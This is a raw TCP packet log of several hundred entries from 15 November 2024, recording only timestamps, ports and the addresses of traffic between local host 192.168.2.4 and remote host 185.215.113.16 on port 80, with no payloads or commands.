Nov 15, 2024 14:09:35.872464895 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872488022 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872576952 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872590065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872601986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872612953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872621059 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872627974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872639894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872646093 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872652054 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872663975 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872674942 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872675896 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872703075 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872706890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872716904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872720957 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872734070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872750044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872750044 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872761965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872772932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872780085 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872792959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872793913 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872819901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872845888 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873452902 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873469114 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873482943 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873505116 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873522043 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873727083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873739958 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873752117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873779058 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873795033 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873895884 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873914957 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873928070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873939991 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.873950958 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873975039 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873996019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.873997927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874172926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874190092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874190092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.874202013 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874211073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.874214888 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874228954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874233007 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.874243021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874253988 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.874258041 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874274015 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.874284983 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.874305010 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.874461889 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.874507904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.916281939 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.916296959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.916309118 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.916359901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.916440964 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.946469069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946486950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946496010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946512938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946568966 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.946623087 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.946634054 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946649075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946660042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946674109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946685076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946695089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946705103 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.946722984 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.946738005 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.946820021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946831942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.946861982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.947021008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.947062016 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.947154999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.947175980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.947199106 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.947235107 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.948357105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.948373079 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.948383093 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.948436022 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.948460102 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983206987 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983220100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983231068 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983313084 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983411074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983423948 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983436108 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983448982 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983458996 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983475924 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983505011 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983540058 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983577013 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983650923 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983664036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983676910 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983688116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983691931 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983700991 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983711004 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983714104 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983726025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983743906 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983772993 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983855009 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983896971 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983933926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983946085 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.983973026 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.983985901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984071970 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984085083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984096050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984107018 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984121084 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984152079 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984330893 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984342098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984354973 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984380960 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984400034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984405994 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984414101 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984426975 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984436035 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984437943 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984450102 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984451056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984462976 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984466076 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984474897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984483957 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984487057 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984513998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984529018 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984719992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984731913 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984762907 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984899998 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984910965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984924078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984935045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984941006 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984947920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984956980 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.984958887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984971046 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.984985113 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985013008 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985260963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985274076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985285044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985299110 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985311985 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985327959 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985393047 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985404968 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985414982 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985434055 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985439062 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985451937 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985461950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985474110 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985481977 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985485077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985502958 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985512018 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985523939 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985692978 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985702991 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985728025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985738993 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985748053 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985749006 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985759974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985770941 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985780954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985784054 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985784054 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985794067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985804081 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985805035 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985815048 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.985831022 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985838890 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.985865116 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986206055 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986215115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986224890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986236095 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986246109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986255884 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986283064 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986443043 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986453056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986463070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986473083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986480951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986481905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986491919 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986493111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986520052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986526012 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986541986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986546993 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986557961 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986567020 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986567974 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986577034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986582041 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986588955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986589909 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986599922 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986609936 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986618996 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986624002 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986629963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986640930 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986651897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.986653090 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986673117 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.986680031 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987375021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987386942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987396955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987406015 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987416983 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987426043 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987427950 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987438917 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987448931 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987458944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987464905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987468958 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987484932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987489939 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987494946 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987500906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987512112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987520933 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987524033 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987531900 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987543106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987550974 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987560034 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987582922 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987932920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987942934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987951994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987962008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.987977028 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.987998009 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988049984 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988059044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988065004 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988075972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988089085 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988107920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988132954 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988244057 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988255978 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988265991 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988275051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988280058 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988286972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988312006 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988352060 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988362074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988392115 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988470078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988481045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988507032 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988508940 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988519907 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988524914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988532066 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988543034 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988555908 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988569975 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988652945 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988663912 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988672972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.988697052 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.988714933 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.032622099 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.032639980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.032649994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.032699108 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.032728910 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062036037 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062047958 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062058926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062068939 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062093973 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062125921 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062169075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062221050 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062238932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062249899 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062254906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062259912 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062309027 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062398911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062410116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062419891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062429905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062439919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062443018 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062450886 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.062458992 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062477112 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.062499046 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.063354969 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.063365936 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.063375950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.063406944 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.063422918 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.102101088 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.102127075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.102137089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.102216959 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.102258921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.102269888 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.102279902 CET	80	49761	185.215.113.16	192.168.2.4
